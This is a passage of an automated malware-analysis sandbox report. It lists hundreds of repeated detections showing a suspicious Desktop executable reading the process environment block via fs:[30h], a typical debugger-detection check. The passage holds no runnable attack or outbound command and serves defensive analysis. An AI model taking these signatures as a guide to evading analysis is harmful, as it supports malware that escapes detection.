                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A8243 mov ecx, dword ptr fs:[00000030h] | 11_2_010A8243
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A250 mov eax, dword ptr fs:[00000030h] | 11_2_0101A250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F625D mov eax, dword ptr fs:[00000030h] | 11_2_010F625D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026259 mov eax, dword ptr fs:[00000030h] | 11_2_01026259
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010DA250 mov eax, dword ptr fs:[00000030h] | 11_2_010DA250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010DA250 mov eax, dword ptr fs:[00000030h] | 11_2_010DA250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01024260 mov eax, dword ptr fs:[00000030h] | 11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01024260 mov eax, dword ptr fs:[00000030h] | 11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01024260 mov eax, dword ptr fs:[00000030h] | 11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101826B mov eax, dword ptr fs:[00000030h] | 11_2_0101826B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h] | 11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105E284 mov eax, dword ptr fs:[00000030h] | 11_2_0105E284
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105E284 mov eax, dword ptr fs:[00000030h] | 11_2_0105E284
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h] | 11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h] | 11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h] | 11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010302A0 mov eax, dword ptr fs:[00000030h] | 11_2_010302A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010302A0 mov eax, dword ptr fs:[00000030h] | 11_2_010302A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov ecx, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h] | 11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h] | 11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h] | 11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h] | 11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h] | 11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h] | 11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F62D6 mov eax, dword ptr fs:[00000030h] | 11_2_010F62D6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h] | 11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h]11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h]11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6500 mov eax, dword ptr fs:[00000030h]11_2_010B6500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028550 mov eax, dword ptr fs:[00000030h]11_2_01028550
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028550 mov eax, dword ptr fs:[00000030h]11_2_01028550
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022582 mov eax, dword ptr fs:[00000030h]11_2_01022582
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022582 mov ecx, dword ptr fs:[00000030h]11_2_01022582
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01054588 mov eax, dword ptr fs:[00000030h]11_2_01054588
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E59C mov eax, dword ptr fs:[00000030h]11_2_0105E59C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010445B1 mov eax, dword ptr fs:[00000030h]11_2_010445B1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010445B1 mov eax, dword ptr fs:[00000030h]11_2_010445B1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E5CF mov eax, dword ptr fs:[00000030h]11_2_0105E5CF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E5CF mov eax, dword ptr fs:[00000030h]11_2_0105E5CF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010265D0 mov eax, dword ptr fs:[00000030h]11_2_010265D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A5D0 mov eax, dword ptr fs:[00000030h]11_2_0105A5D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A5D0 mov eax, dword ptr fs:[00000030h]11_2_0105A5D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010225E0 mov eax, dword ptr fs:[00000030h]11_2_010225E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C5ED mov eax, dword ptr fs:[00000030h]11_2_0105C5ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C5ED mov eax, dword ptr fs:[00000030h]11_2_0105C5ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C427 mov eax, dword ptr fs:[00000030h]11_2_0101C427
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A430 mov eax, dword ptr fs:[00000030h]11_2_0105A430
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA456 mov eax, dword ptr fs:[00000030h]11_2_010DA456
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101645D mov eax, dword ptr fs:[00000030h]11_2_0101645D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104245A mov eax, dword ptr fs:[00000030h]11_2_0104245A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC460 mov ecx, dword ptr fs:[00000030h]11_2_010AC460
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA49A mov eax, dword ptr fs:[00000030h]11_2_010DA49A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010264AB mov eax, dword ptr fs:[00000030h]11_2_010264AB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010544B0 mov ecx, dword ptr fs:[00000030h]11_2_010544B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AA4B0 mov eax, dword ptr fs:[00000030h]11_2_010AA4B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010204E5 mov ecx, dword ptr fs:[00000030h]11_2_010204E5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C700 mov eax, dword ptr fs:[00000030h]11_2_0105C700
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020710 mov eax, dword ptr fs:[00000030h]11_2_01020710
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01050710 mov eax, dword ptr fs:[00000030h]11_2_01050710
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C720 mov eax, dword ptr fs:[00000030h]11_2_0105C720
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C720 mov eax, dword ptr fs:[00000030h]11_2_0105C720
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov eax, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov ecx, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov eax, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109C730 mov eax, dword ptr fs:[00000030h]11_2_0109C730
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov esi, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov eax, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov eax, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020750 mov eax, dword ptr fs:[00000030h]11_2_01020750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062750 mov eax, dword ptr fs:[00000030h]11_2_01062750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062750 mov eax, dword ptr fs:[00000030h]11_2_01062750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE75D mov eax, dword ptr fs:[00000030h]11_2_010AE75D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A4755 mov eax, dword ptr fs:[00000030h]11_2_010A4755
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028770 mov eax, dword ptr fs:[00000030h]11_2_01028770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C678E mov eax, dword ptr fs:[00000030h]11_2_010C678E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010207AF mov eax, dword ptr fs:[00000030h]11_2_010207AF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D47A0 mov eax, dword ptr fs:[00000030h]11_2_010D47A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102C7C0 mov eax, dword ptr fs:[00000030h]11_2_0102C7C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A07C3 mov eax, dword ptr fs:[00000030h]11_2_010A07C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE7E1 mov eax, dword ptr fs:[00000030h]11_2_010AE7E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010247FB mov eax, dword ptr fs:[00000030h]11_2_010247FB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010247FB mov eax, dword ptr fs:[00000030h]11_2_010247FB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E609 mov eax, dword ptr fs:[00000030h]11_2_0109E609
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062619 mov eax, dword ptr fs:[00000030h]11_2_01062619
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E627 mov eax, dword ptr fs:[00000030h]11_2_0103E627
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01056620 mov eax, dword ptr fs:[00000030h]11_2_01056620
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058620 mov eax, dword ptr fs:[00000030h]11_2_01058620
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102262C mov eax, dword ptr fs:[00000030h]11_2_0102262C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103C640 mov eax, dword ptr fs:[00000030h]11_2_0103C640
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E866E mov eax, dword ptr fs:[00000030h]11_2_010E866E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E866E mov eax, dword ptr fs:[00000030h]11_2_010E866E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A660 mov eax, dword ptr fs:[00000030h]11_2_0105A660
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A660 mov eax, dword ptr fs:[00000030h]11_2_0105A660
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01052674 mov eax, dword ptr fs:[00000030h]11_2_01052674
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024690 mov eax, dword ptr fs:[00000030h]11_2_01024690
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024690 mov eax, dword ptr fs:[00000030h]11_2_01024690
